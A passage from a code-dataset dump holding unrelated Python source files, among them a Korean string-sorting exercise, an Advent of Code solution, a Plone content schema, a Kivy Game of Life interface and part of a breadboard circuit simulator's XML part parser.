b\"\"\n","repo_name":"kpn/cachetory","sub_path":"tests/backends/sync/test_redis.py","file_name":"test_redis.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"18"} +{"seq_id":"22040924232","text":"# 문자열을 내림차순 배치\n\n# 문자열 s에 나타나는 문자를 큰것부터 작은 순으로 정렬해 새로운 문자열을 리턴하는 함수, solution을 완성해주세요.\n\n# s는 영문 대소문자로만 구성되어 있으며, 대문자는 소문자보다 작은 것으로 간주합니다.\n\ndef solution(s):\n\n answer = ''\n\n upper_lower = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'\n\n s_index = [] # s의 인덱스 배열\n\n for char in s:\n idx = upper_lower.index(char)\n s_index.append(idx)\n\n s_index = sorted(s_index, reverse=True)\n\n for i in range(len(s_index)):\n answer += upper_lower[s_index[i]]\n \n return answer\n\n\nprint(solution(\"Zbcdefg\")) # \"gfedcbZ\"\n","repo_name":"glory0224/Algorithm","sub_path":"Programmers/Level1/String/arrange_string_descending.py","file_name":"arrange_string_descending.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8222278655","text":"import pandas as pd\n\nfrom scripts.params import PARAMS, age_ranger\n\ndef transform(data_obj, batch=False) -> pd.DataFrame:\n\n\t# Initialization\n\tif batch:\n\t\tdf = pd.read_csv(data_obj)\n\n\telse:\n\t\tdf = pd.DataFrame(data_obj).T\n\t\tdf.columns = ['country', 'sex', 'age']\n\n\t # Transformation\n\t\t\n\tdf['country'] = df.country.apply(lambda x:x.lower())\n\tdf['country'] = df.country.replace(PARAMS['country_list'])\n\tdf['sex'] = df.sex.replace(PARAMS['sex_list'])\n\tdf['age'] = pd.to_numeric(df['age'])\n\tdf['age'] = df.age.apply(age_ranger)\n\n\n\n\treturn df\n","repo_name":"LukaPerkovic/mle-course-homeworks","sub_path":"deployment_hw/scripts/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34439723429","text":"f = open('day1input.txt')\nfloor = f.readline()\n\n#part 1\ny = 0\nfor x in floor:\n if x == '(':\n y += 1\n elif x == ')':\n y -= 1\nprint(y)\n\n#part 2\ny = 0\ncount = 0\nfor x in floor:\n if y >= 0:\n if x == '(':\n y += 1\n elif x == ')':\n y -= 1\n count += 1\nprint(count)\n","repo_name":"coreymizzou/AdventOfCode","sub_path":"day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41839950926","text":"# coding=utf-8\n# 代码文件:chapter22/ch22.1.5.py\n\nimport matplotlib.pyplot as plt\n\n# 设置中文字体\nplt.rcParams['font.family'] = ['SimHei']\n\n# 各种活动标题列表\nactivies = ['工作', '睡', '吃', '玩']\n# 各种活动所占时间列表\nslices = [8, 7, 3, 6]\n# 各种活动在饼状图中的颜色列表\ncols = ['c', 'm', 'r', 'b']\n\nplt.pie(slices, labels=activies, colors=cols,\n shadow=True, explode=(0, 0.1, 0, 0), autopct='%.1f%%')\n\nplt.title('绘制饼状图')\n\nplt.show() # 显示图形\n","repo_name":"tonyguan/python1","sub_path":"code/chapter22/ch22.1.5.py","file_name":"ch22.1.5.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"zh","doc_type":"code","stars":23,"dataset":"github-code","pt":"18"} +{"seq_id":"415704970","text":"# -*- coding: utf-8 -*-\nfrom ts16.content import _\n# from plone.autoform import directives\n#from plone.supermodel import directives\nfrom zope import schema\nfrom plone.autoform.interfaces import IFormFieldProvider\nfrom plone.supermodel import model\nfrom zope.component import adapts\nfrom zope.interface import alsoProvides, implements\nfrom zope.interface import provider\n#from z3c.relationfield.schema import RelationList, RelationChoice\n#from plone.app.vocabularies.catalog import CatalogSource\nfrom plone.dexterity.interfaces import IDexterityContent\n#from plone.directives import dexterity\nfrom plone.app.textfield import RichText\n#from plone.app.content.interfaces import INameFromTitle\nfrom plone.namedfile.field import NamedBlobImage, NamedBlobFile\n#from DateTime import DateTime\n#import random\n#from plone.directives import form\n\n\nclass IBigImage(model.Schema):\n \"\"\" Add bigImage_* field \"\"\"\n\n model.fieldset(\n 'bigImage',\n label=_(u\"bigImage\"),\n fields=['bigImage_1', 'photoer_1', 'bigImage_2', 'photoer_2', 'bigImage_3', 'photoer_3',\n 'bigImage_4', 'photoer_4', 'bigImage_5', 'photoer_5', ]\n )\n\n model.fieldset(\n 'english',\n label=_(u\"English\"),\n fields=['en_title', 'en_description', 'en_text', ]\n )\n\n model.fieldset(\n 'vote',\n label=_(u\"Vote\"),\n fields=['voteTitle', 'vote', 'voteEmail']\n )\n\n voteEmail = schema.Text(\n title=_(u\"Vote Email\"),\n required=False,\n )\n\n voteTitle = schema.TextLine(\n title=_(u\"Vote Title\"),\n required=True,\n )\n\n vote = schema.Int(\n title=_(u\"Vote counter\"),\n default=0,\n )\n\n en_title = schema.Text(\n title=_(u\"English Title\"),\n required=False,\n )\n\n en_description = schema.Text(\n title=_(u\"English Description\"),\n description=u\"英文摘要,與中文摘要格式同\",\n required=False,\n )\n\n en_text = RichText(\n title=_(u\"English text\"),\n required=False,\n )\n\n bigImage_1 = NamedBlobImage(\n title=_(u\"Big Image\"),\n description=_(u\"Big image for page. Size:1900 X 950\"),\n required=False,\n )\n\n bigImage_2 = NamedBlobImage(\n title=_(u\"Big Image\"),\n description=_(u\"Big image for page. Size:1900 X 950\"),\n required=False,\n )\n\n bigImage_3 = NamedBlobImage(\n title=_(u\"Big Image\"),\n description=_(u\"Big image for page. Size:1900 X 950\"),\n required=False,\n )\n\n bigImage_4 = NamedBlobImage(\n title=_(u\"Big Image\"),\n description=_(u\"Big image for page. Size:1900 X 950\"),\n required=False,\n )\n\n bigImage_5 = NamedBlobImage(\n title=_(u\"Big Image\"),\n description=_(u\"Big image for page. Size:1900 X 950\"),\n required=False,\n )\n\n photoer_1 = schema.TextLine(\n title=_(u\"Photographer\"),\n required=False,\n )\n\n photoer_2 = schema.TextLine(\n title=_(u\"Photographer\"),\n required=False,\n )\n\n photoer_3 = schema.TextLine(\n title=_(u\"Photographer\"),\n required=False,\n )\n\n photoer_4 = schema.TextLine(\n title=_(u\"Photographer\"),\n required=False,\n )\n\n photoer_5 = schema.TextLine(\n title=_(u\"Photographer\"),\n required=False,\n )\n\n\nalsoProvides(IBigImage, IFormFieldProvider)\n\n\ndef context_property(name):\n def getter(self):\n return getattr(self.context, name)\n def setter(self, value):\n setattr(self.context, name, value)\n def deleter(self):\n delattr(self.context, name)\n return property(getter, setter, deleter)\n\n\nclass BigImage(object):\n implements(IBigImage)\n adapts(IDexterityContent)\n\n def __init__(self,context):\n self.context = context\n\n # -*- Your behavior property setters & getters here ... -*-\n bigImage_1 = context_property(\"bigImage_1\")\n bigImage_2 = context_property(\"bigImage_2\")\n bigImage_3 = context_property(\"bigImage_3\")\n bigImage_4 = context_property(\"bigImage_4\")\n bigImage_5 = context_property(\"bigImage_5\")\n photoer_1 = context_property(\"photoer_1\")\n photoer_2 = context_property(\"photoer_2\")\n photoer_3 = context_property(\"photoer_3\")\n photoer_4 = context_property(\"photoer_4\")\n photoer_5 = context_property(\"photoer_5\")\n en_title = context_property(\"en_title\")\n en_description = context_property(\"en_description\")\n en_text = context_property(\"en_text\")\n vote = context_property(\"vote\")\n voteTitle = context_property(\"voteTitle\")\n voteEmail = context_property(\"voteEmail\")\n","repo_name":"mingtak/ts16.content_2018","sub_path":"src/ts16/content/behavior/behaviors.py","file_name":"behaviors.py","file_ext":"py","file_size_in_byte":4571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27614297564","text":"# Напишите функцию, которая принимает на вход ��троку — абсолютный путь до файла.\n# Функция возвращает кортеж из трёх элементов: путь, имя файла, расширение файла.\n\ndef data_processing(data: str) -> tuple | None:\n try:\n index = data.rfind('/') + 1\n if index == 0:\n raise ValueError()\n path, file = data[:index], data[index:]\n file, form = file.split('.')\n return path, file, form\n except ValueError:\n return None\n\n\nif __name__ == \"__main__\":\n PATH_TO_FILE = 'ASDFASDF/ASD/A/SD/FA/SDF/ASD/Free.py'\n print(data_processing(PATH_TO_FILE))\n","repo_name":"SketchLife0/Web_python_developer","sub_path":"Погружение в Python/Seminar5/Task1.py","file_name":"Task1.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4204112673","text":"import GameOfLife\nfrom .Controllers import GrowthMediumCTRL\nfrom kivy.clock import Clock\nfrom kivy.core.window import Window\nfrom kivy.factory import Factory\nfrom kivy.graphics import Color, Rectangle\nfrom kivy.graphics.instructions import InstructionGroup\nfrom kivy.lang import Builder\nfrom kivy.properties import NumericProperty, ListProperty\nfrom kivy.uix.button import Button\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.label import Label\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.popup import Popup\nfrom os.path import dirname, abspath\n\n#\n# Styles\n#\n\nBuilder.load_file('{}/Views.kv'.format(dirname(abspath(GameOfLife.__file__))))\n\n\n#\n# Base Elements\n#\n\n\nclass CtrlButton(Button):\n \"\"\" CtrlButton represent a button who interacts with control \"\"\"\n def __init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n self.ctrl = grid_ctrl\n super().__init__(**kwargs)\n\n\nclass CtrlLabel(Label):\n \"\"\" CtrlLabel represent a label who interacts with control \"\"\"\n def __init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n self.ctrl = grid_ctrl\n super().__init__(**kwargs)\n\n\nclass CtrlPopup(Popup):\n \"\"\" CtrlPopup represent a popup who interacts with control \"\"\"\n def __init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n self.ctrl = grid_ctrl\n super(CtrlPopup, self).__init__(**kwargs)\n\n\nclass InputCtrl(TextInput):\n \"\"\" InputCtrl represent a text input who interacts with control \"\"\"\n def __init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n self.ctrl = grid_ctrl\n super().__init__(**kwargs)\n\n\n#\n# Main Layouts\n#\n\n\nclass GameLayout(GridLayout):\n \"\"\" GameLayout represent the wrapper of all interface components \"\"\"\n def __init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n self.ctrl = grid_ctrl\n super().__init__(**kwargs)\n self.add_widget(ControlsBar(self.ctrl))\n self.add_widget(Factory.TutorialLabel())\n self.gms = GrowthMediumSurface(self.ctrl)\n self.add_widget(self.gms)\n\n def refresh_keyboard(self) -> None:\n \"\"\" Refresh GrowthMediumSurface's keyboard listener\n\n This method helps to reinstall the binding for the keyboard listener when a popup compromise it.\n\n :return: None\n\n \"\"\"\n self.gms.refresh_keyboard()\n\n\nclass ControlsBar(GridLayout):\n \"\"\" ControlsBar represent the wrapper of all main controls interface buttons \"\"\"\n def __init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n self.ctrl = grid_ctrl\n super().__init__(**kwargs)\n self.add_widget(Factory.Load(self.ctrl))\n self.add_widget(Factory.Save(self.ctrl))\n self.add_widget(Factory.Reset(self.ctrl))\n self.add_widget(Factory.Clear(self.ctrl))\n self.add_widget(Factory.SpeedLabel(self.ctrl))\n self.add_widget(Factory.SpeedDown(self.ctrl))\n self.add_widget(Factory.Pause(self.ctrl))\n self.add_widget(Factory.Start(self.ctrl))\n self.add_widget(Factory.SpeedUp(self.ctrl))\n self.add_widget(Factory.ZoomLabel(self.ctrl))\n self.add_widget(Factory.ZoomOut(self.ctrl))\n self.add_widget(Factory.ZoomIn(self.ctrl))\n\n\nclass GrowthMediumSurface(Label):\n \"\"\" GrowthMediumSurface represent the GrowthMedium cells' grid\n\n This class holds all graphic information and transitions needed to the pretty and correct visualization of cells\n evolution. Starting from single cell's state's color to continue with current grid view, its size and its position.\n\n \"\"\"\n # Current cells' state\n cells = ListProperty()\n old_cells = []\n\n # Position and dimension information's\n cell_rows = NumericProperty()\n cell_cols = NumericProperty()\n\n zoom = NumericProperty()\n\n pos_x = NumericProperty()\n pos_y = NumericProperty()\n\n # Size information for correct draw\n cell_size_w = NumericProperty()\n cell_size_h = NumericProperty()\n\n border_w = NumericProperty()\n border_h = NumericProperty()\n\n hbar_w = NumericProperty()\n hbar_h = 3\n vbar_w = 3\n vbar_h = NumericProperty()\n\n # Canvas objects\n cells_canvas = []\n bars_canvas = []\n\n # Colors\n bars_color = (0, 0, 1, .8)\n cell_color_state = [(0.2, 0.2, 0.2, 1), (0, 1, 0, .5), (1, 0, 0, .5)]\n\n # just to avoid bug\n _first_draw = True\n _scheduled_draw = False\n\n def __init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n self.ctrl = grid_ctrl\n super(GrowthMediumSurface, self).__init__(**kwargs)\n Window.bind(on_resize=self._redraw)\n self._keyboard = Window.request_keyboard(self._keyboard_closed, self)\n self._keyboard.bind(on_key_down=self._on_keyboard_down)\n\n #\n # Draw managers\n #\n\n def on_cells(self, *args: object) -> None:\n \"\"\" Cells listener\n\n This method catches cells updated state and manage the redraw of the GUI.\n\n :return: None\n\n \"\"\"\n if len(self.cells) == len(self.old_cells) and not self._scheduled_draw:\n self._draw_update()\n self._draw_bars()\n else:\n self._redraw()\n self.old_cells = self.cells\n\n def texture_update(self, *args: object) -> None:\n \"\"\" Texture listener\n\n This method is used to draw the GUI the first time.\n\n :return: None\n\n \"\"\"\n self._redraw()\n\n #\n # User input listeners\n #\n\n def refresh_keyboard(self) -> None:\n \"\"\" Refresh keyboard listener\n\n This method reinstalls the binding for the keyboard listener.\n\n :return: None\n\n \"\"\"\n self._keyboard = Window.request_keyboard(self._keyboard_closed, self)\n self._keyboard.bind(on_key_down=self._on_keyboard_down)\n\n def _keyboard_closed(self):\n self._keyboard.unbind(on_key_down=self._on_keyboard_down)\n self._keyboard = None\n\n def _on_keyboard_down(self, keyboard, keycode, text, modifiers):\n if keycode[1] == 'spacebar':\n if self.ctrl.is_running:\n self.ctrl.pause_evolution()\n elif self.ctrl.can_run:\n self.ctrl.start_evolution()\n elif keycode[1] == 'up':\n self.ctrl.increase_zoom()\n elif keycode[1] == 'down':\n self.ctrl.decrease_zoom()\n elif keycode[1] == 'left':\n self.ctrl.decrease_fps()\n elif keycode[1] == 'right':\n self.ctrl.increase_fps()\n elif keycode[1] == 'w':\n self.ctrl.move_up()\n elif keycode[1] == 'a':\n self.ctrl.move_left()\n elif keycode[1] == 's':\n self.ctrl.move_down()\n elif keycode[1] == 'd':\n self.ctrl.move_right()\n if keycode[1] in ['up', 'down', 'left', 'right', 'w', 'a', 's', 'd']:\n self._draw_bars()\n\n def on_touch_down(self, touch: object) -> None:\n \"\"\" Click listener\n\n This method catches user's clicks to update custom grid.\n\n :return: None\n\n \"\"\"\n if not self.ctrl.is_running and self.height > touch.pos[1]:\n w = int(touch.pos[0])\n h = int(touch.pos[1])\n i = max(self.cell_rows - int((h - self.border_h) / (self.cell_size_h + 1)) - 1, 0)\n j = min(int((w - self.border_w) / (self.cell_size_w + 1)), self.cell_cols - 1)\n self.ctrl.update_custom_growth_medium(i, j)\n\n #\n # Cells and bars designers\n #\n\n def _redraw(self, *args):\n if not self._scheduled_draw:\n self._scheduled_draw = True\n Clock.schedule_once(self._schedule_redraw, self.zoom / 30)\n\n def _schedule_redraw(self, *args):\n self.canvas.clear()\n self.cells_canvas = [None] * len(self.cells)\n for i in range(self.cell_rows):\n for j in range(self.cell_cols):\n pos = j + (self.cell_rows - i - 1) * self.cell_cols\n cell = InstructionGroup()\n cell.add(Color(*self.cell_color_state[self.cells[pos]]))\n cell.add(Rectangle(\n pos=(\n j * (self.cell_size_w + 1) + self.border_w,\n i * (self.cell_size_h + 1) + self.border_h\n ), size=(self.cell_size_w, self.cell_size_h)))\n self.cells_canvas[pos] = cell\n self.canvas.add(cell)\n if not self._first_draw:\n self._draw_bars()\n else:\n self._first_draw = False\n self._scheduled_draw = False\n\n def _draw_bars(self):\n if len(self.bars_canvas) > 0:\n self.canvas.remove(self.bars_canvas.pop())\n self.canvas.remove(self.bars_canvas.pop())\n hbar = InstructionGroup()\n vbar = InstructionGroup()\n hbar.add(Color(*self.bars_color))\n vbar.add(Color(*self.bars_color))\n vbar.add(Rectangle(\n pos=(self.width - self.vbar_w - 1, self.border_h + self.vbar_pos_h),\n size=(self.vbar_w, self.vbar_h)))\n hbar.add(Rectangle(\n pos=(self.hbar_pos_w, 1),\n size=(self.hbar_w, self.hbar_h)))\n self.bars_canvas.append(vbar)\n self.bars_canvas.append(hbar)\n self.canvas.add(vbar)\n self.canvas.add(hbar)\n\n def _draw_update(self):\n for i in range(self.cell_rows):\n for j in range(self.cell_cols):\n pos = j + (self.cell_rows - i - 1) * self.cell_cols\n if self.cells[pos] != self.old_cells[pos]:\n new_cell = InstructionGroup()\n new_cell.add(Color(*self.cell_color_state[self.cells[j + (self.cell_rows - i - 1) * self.cell_cols]]))\n new_cell.add(Rectangle(\n pos=(\n j * (self.cell_size_w + 1) + self.border_w,\n i * (self.cell_size_h + 1) + self.border_h\n ), size=(self.cell_size_w, self.cell_size_h)))\n self.canvas.remove(self.cells_canvas[pos])\n self.cells_canvas[pos] = new_cell\n self.canvas.add(new_cell)\n\n\n#\n# Popups\n#\n\n\nclass SaveCtrlPopup(CtrlPopup):\n \"\"\" SaveCtrlPopup contains the view to save current GrowthMedium \"\"\"\n def __init__(self, keyboard_listener: GrowthMediumSurface, **kwargs: object):\n super(SaveCtrlPopup, self).__init__(**kwargs)\n self.keyboard_listener = keyboard_listener\n self.add_widget(SaveGridCtrl(self.ctrl))\n\n def dismiss(self, *largs: object, **kwargs: object):\n super().dismiss()\n self.keyboard_listener.refresh_keyboard()\n\n\nclass SaveGridCtrl(GridLayout):\n \"\"\" SaveGridCtrl contains all inputs to save current GrowthMedium \"\"\"\n def __init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n self.ctrl = grid_ctrl\n super(SaveGridCtrl, self).__init__(**kwargs)\n self.add_widget(InputCtrl(self.ctrl))\n self.add_widget(Factory.SavePopupBtn(self.ctrl))\n self.add_widget(Factory.CloseSavePopupBtn(self.ctrl))\n\n\nclass LoadCtrlPopup(CtrlPopup):\n \"\"\" LoadCtrlPopup contains the view to load a GrowthMedium \"\"\"\n def __init__(self, **kwargs: object):\n super(LoadCtrlPopup, self).__init__(**kwargs)\n self.add_widget(LoadGridCtrl(self.ctrl))\n\n\nclass LoadGridCtrl(GridLayout):\n \"\"\" LoadGridCtrl contains all inputs to load a GrowthMedium \"\"\"\n def __init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n self.ctrl = grid_ctrl\n super(LoadGridCtrl, self).__init__(**kwargs)\n self.add_widget(ScrollFilesCtrl(self.ctrl))\n self.add_widget(Factory.LoadLabel(self.ctrl))\n self.add_widget(ActionLoadGridCtrl(self.ctrl))\n\n\nclass ActionLoadGridCtrl(GridLayout):\n \"\"\" ActionLoadGridCtrl contains action's buttons \"\"\"\n def __init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n self.ctrl = grid_ctrl\n super(ActionLoadGridCtrl, self).__init__(**kwargs)\n self.add_widget(Factory.LoadPopupBtn(self.ctrl))\n self.add_widget(Factory.CloseLoadPopupBtn(self.ctrl))\n\n\nclass ScrollFilesCtrl(ScrollView):\n \"\"\" ScrollFilesCtrl contains the scrollable list of files \"\"\"\n def __init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n self.ctrl = grid_ctrl\n super(ScrollFilesCtrl, self).__init__(**kwargs)\n file_ctrl = FileCtrl(self.ctrl)\n file_ctrl.bind(minimum_height=file_ctrl.setter('height'))\n self.add_widget(file_ctrl)\n\n\nclass FileCtrl(GridLayout):\n \"\"\" FileCtrl contains the Growth Medium's input files list \"\"\"\n def __init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n self.ctrl = grid_ctrl\n super(FileCtrl, self).__init__(**kwargs)\n for file in self.ctrl.get_growth_medium_files():\n self.add_widget(Factory.FileCtrlBtn(self.ctrl, text=file))\n","repo_name":"LordAlucard90/Conway-s-Game-of-Life","sub_path":"GameOfLife/Views.py","file_name":"Views.py","file_ext":"py","file_size_in_byte":13008,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"39392075207","text":"import math\nimport os.path\nimport textwrap\n\nimport pygame.image\nimport xml.etree.ElementTree as Et\n\nfrom logic.electronics import Node, Sink\nfrom collections import namedtuple\nfrom _elementtree import ParseError\nfrom ui.interface import List, ListItem\nfrom ui.colours import *\nfrom ui.text import TextHandler\n\n\n# Named tuples for readable code\nBoardConfig = namedtuple(\"BoardConfig\", \"start_coord segment_gap per_segment_columns per_column_rows \"\n \"per_segment_rep_count per_segment_rep_gap rule\")\nRule = namedtuple(\"Rule\", \"segment repetition column row\")\nSupplyInfo = namedtuple(\"SupplyInfo\", \"pos_rail neg_rail radius\")\nDiscriminator = namedtuple(\"Discriminator\", \"segment rep column row name\")\n\n\n# Input an XML element and return a named tuple with extracted information about a breadboard\ndef get_board_config(element):\n start_coord = tuple(int(i) for i in element.find(\"startCoord\").text.split(\",\"))\n segment_gap = int(element.find(\"segmentGap\").text)\n per_segment_columns = int(element.find(\"perSegmentColumns\").text)\n per_column_rows = int(element.find(\"perColumnRows\").text)\n per_segment_rep = element.find(\"perSegmentRepetition\")\n per_segment_rep_count = int(per_segment_rep.text)\n per_segment_rep_gap = int(per_segment_rep.attrib.get(\"gap\"))\n rule = element.attrib.get(\"rule\").split(\",\")\n rule = Rule(\"SEGMENT\" in rule, \"REPETITION\" in rule, \"COLUMN\" in rule, \"ROW\" in rule)\n return BoardConfig(start_coord, segment_gap, per_segment_columns, per_column_rows, per_segment_rep_count,\n per_segment_rep_gap, rule)\n\n\n# Parse the part XML file and create Part objects for each entry\ndef parse(xml_path):\n try:\n\n # Create an object tree of the XML\n parts_xml = Et.parse(xml_path)\n\n # Get the parent root\n root = parts_xml.getroot()\n parts_tree = root.findall(\"part\")\n boards, ics, electronics = {}, {}, {}\n\n for part in parts_tree:\n\n try:\n # Get the name, description, name of textures, type and identifier of each element\n part_name = part.find(\"name\").text\n part_desc = part.find(\"desc\").text\n part_picture = part.find(\"picture\").text\n part_texture = part.find(\"texture\").text\n part_type = part.attrib.get(\"type\")\n part_uid = part.attrib.get(\"uid\")\n\n # If the part is a board, add it to the boards list\n if part_type == \"board\":\n board_config = part.find(\"boardConfig\")\n size = board_config.find(\"size\").text\n size = tuple(int(i) for i in size.split('x'))\n inch_tenth = int(board_config.find(\"inchTenth\").text)\n radius = int(board_config.find(\"radius\").text)\n\n main_board = board_config.find(\"mainBoard\")\n main_board_config = get_board_config(main_board)\n\n power_rails = board_config.find(\"powerRails\")\n if power_rails is not None:\n rail_config = get_board_config(power_rails)\n else:\n rail_config = None\n\n board = (part_name, part_desc, part_texture, part_picture, size, inch_tenth, radius,\n main_board_config, rail_config), Breadboard\n\n boards[part_uid] = board\n\n # If the part is a power supply, add it to the electronics list\n if part_type == \"supply\":\n power_config = part.find(\"powerConfig\")\n size = power_config.find(\"size\").text\n size = tuple(int(i) for i in size.split('x'))\n radius = int(power_config.find(\"nodeRadius\").text)\n inch_tenth = int(power_config.find(\"inchTenth\").text)\n voltage = int(power_config.find(\"voltage\").text)\n pos_node = power_config.find(\"posNodeCoord\").text\n pos_node = tuple(int(i) for i in pos_node.split(','))\n neg_node = power_config.find(\"negNodeCoord\").text\n neg_node = tuple(int(i) for i in neg_node.split(','))\n\n pos_info = SupplyInfo(pos_node, neg_node, radius)\n\n supply = (part_name, part_desc, part_texture, part_picture, size, voltage, pos_info, inch_tenth), \\\n PowerSupply\n electronics[part_uid] = supply\n\n # If the part is an IC, add it to the IC list\n if part_type == \"ic\":\n ic_config = part.find(\"icConfig\")\n dip_count = int(ic_config.find(\"dipCount\").text)\n raw_spice = textwrap.dedent(ic_config.find(\"rawSpice\").text)\n spice_nodes = tuple(ic_config.find(\"spiceNodes\").text.split(\" \"))\n datasheet = ic_config.find(\"datasheet\").text\n\n ic = (part_name, part_desc, part_texture, part_picture, dip_count, raw_spice, spice_nodes,\n datasheet), IntegratedCircuit\n ics[part_uid] = ic\n\n # If the part is an LED, add it to the electronics list\n if part_type == \"led\":\n led_config = part.find(\"ledConfig\")\n on_colour = tuple(int(i) for i in led_config.find(\"onColour\").text.split(','))\n off_colour = tuple(int(i) for i in led_config.find(\"offColour\").text.split(','))\n\n led = (part_name, part_desc, part_texture, part_picture, on_colour, off_colour), \\\n LED\n electronics[part_uid] = led\n\n # If the part is a switch, add it to the electronics list\n if part_type == \"switch\":\n switch_config = part.find(\"switchConfig\")\n dip_count = int(switch_config.find(\"dipCount\").text)\n spice_nodes = tuple(switch_config.find(\"spiceNodes\").text.split(\" \"))\n datasheet = switch_config.find(\"datasheet\").text\n latch = int(switch_config.attrib.get(\"latch\"))\n\n ele = (part_name, part_desc, part_texture, part_picture, dip_count, \"\", spice_nodes,\n latch, datasheet), Switch\n electronics[part_uid] = ele\n\n except TypeError:\n continue\n\n return boards, ics, electronics\n\n except (AttributeError, ParseError):\n return None, None, None\n\n\nclass PartManager:\n \"\"\"The PartManager structure holds every part in a category, to be used in creating UI Lists\"\"\"\n\n def __init__(self, title, desc, parts, project, small_title=None):\n self.title = title\n self.small_title = title if small_title is None else small_title\n self.desc = desc\n self.project = project\n self.parts = parts if parts is not None else {}\n\n def find(self, uid):\n if self.parts[uid] is not None:\n return self.parts[uid]\n return None\n\n def create_list(self, size, pos, real_pos, env):\n part_list = List(size, self.title, self.desc, pos, real_pos, env, small_title=self.small_title)\n for part in self.parts:\n conf = self.parts[part][0]\n list_item = ListItem(part_list.size, conf[0], conf[3], conf[1], part, self, env)\n part_list.list_items.append(list_item)\n return part_list\n\n\nclass Part:\n \"\"\"A base class for any part that can be placed in the editor space\"\"\"\n\n BOARD_DESC = \"Breadboards are plastic holed boards in which electronic components can be inserted and connected \" \\\n \"with jumper wires for experimenting with circuits. To connect jumper wires, simply click on a \" \\\n \"breadboard or power supply hole and drag the new wire to your desired point.\"\n IC_DESC = \"Integrated circuits (ICs) are small devices that contain interconnected electronic components on a \" \\\n f\"single chip allowing for small, efficient chips that can perform logic. {' '*170}\" \\\n \"NOTE: You must tie unused inputs on ICs to ground or 5V for de:volt simulation to function. This \" \\\n \"practice encourages you to maintain healthy chip temperature and avoid high-impedance floating \" \\\n \"inputs, which may cause confusing, unexpected logic errors in real life circuitry.\"\n ELECTRONICS_DESC = \"Electrical components, such as resistors and diodes, are basic \" \\\n \"building blocks used in electronic circuits to control the flow of electricity and create \" \\\n f\"complex circuits that perform specific functions. {' '*120}NOTE: To make a resistor, draw a \" \\\n \"wire normally, then select it to choose a resistance.\"\n\n # Initialising the class with any necessary attributes for any part type\n def __init__(self, name, desc, texture, preview_texture, env):\n path = env.get_main_path()\n self.name = name\n self.desc = desc\n self.texture_name, self.preview_texture_name = texture, preview_texture\n self.texture = pygame.image.load(os.path.join(path, 'assets', 'textures', 'parts', texture))\n self.texture = self.texture.convert_alpha()\n self.preview_texture = pygame.image.load(os.path.join(path, 'assets', 'textures', 'parts', preview_texture))\n self.preview_texture = self.preview_texture.convert_alpha()\n self.env = env\n\n\nclass PowerSupply(Part):\n \"\"\"The Power Supply contains two breadboard-type nodes that represent a positive and negative electrical terminal\"\"\"\n\n def __init__(self, name, desc, texture, preview_texture, size, voltage, pos_info, inch_tenth, env):\n super().__init__(name, desc, texture, preview_texture, env)\n self.size = size\n self.inch_tenth = inch_tenth\n self.voltage = voltage\n self.pos_info = pos_info\n neg_rail_coord = pos_info.neg_rail\n pos_rail_coord = pos_info.pos_rail\n radius = pos_info.radius\n pos_rect_tl = (pos_rail_coord[0] - radius, pos_rail_coord[1] - radius)\n neg_rect_tl = (neg_rail_coord[0] - radius, neg_rail_coord[1] - radius)\n rect_wh = (radius*2, radius*2)\n self.rects = [pygame.Rect(pos_rect_tl, rect_wh), pygame.Rect(neg_rect_tl, rect_wh)]\n self.points = [BreadboardPoint(self, Discriminator(0, 0, 0, 1, \"main\"), Node(), self.rects[0]),\n BreadboardPoint(self, Discriminator(0, 0, 0, 0, \"main\"), Sink(), self.rects[1])]\n\n def __getstate__(self):\n \"\"\"Return state values to be pickled.\"\"\"\n return self.name, self.desc, self.texture_name, self.preview_texture_name, self.size, self.voltage, \\\n self.pos_info, self.inch_tenth\n\n def __setstate__(self, state):\n \"\"\"Restore state from the unpickled state values.\"\"\"\n self.__init__(*state, pygame.env)\n\n # Return a surface containing the power supply texture\n def surface(self, real_pos, scale):\n rect_hovered = None\n surface = self.texture.copy()\n incomplete_wire = any(isinstance(x, BreadboardPoint) for x in self.env.query_disable)\n if not len(self.env.query_disable) or incomplete_wire:\n surface_rect = surface.get_rect().copy()\n surface_rect.w *= scale[0]\n surface_rect.h *= scale[1]\n surface_rect.topleft = real_pos\n if surface_rect.collidepoint(pygame.mouse.get_pos()):\n for i, rect in enumerate(self.rects):\n r = rect.copy()\n real_r_pos = tuple(map(sum, zip(real_pos, (r.x * scale[0], r.y * scale[1]))))\n r.w *= scale[0]\n r.h *= scale[1]\n r.topleft = real_r_pos\n if r.collidepoint(pygame.mouse.get_pos()):\n rect_hovered = self.points[i]\n pygame.draw.rect(surface, COL_BLACK, rect)\n pygame.draw.rect(surface, COL_SELECTED, 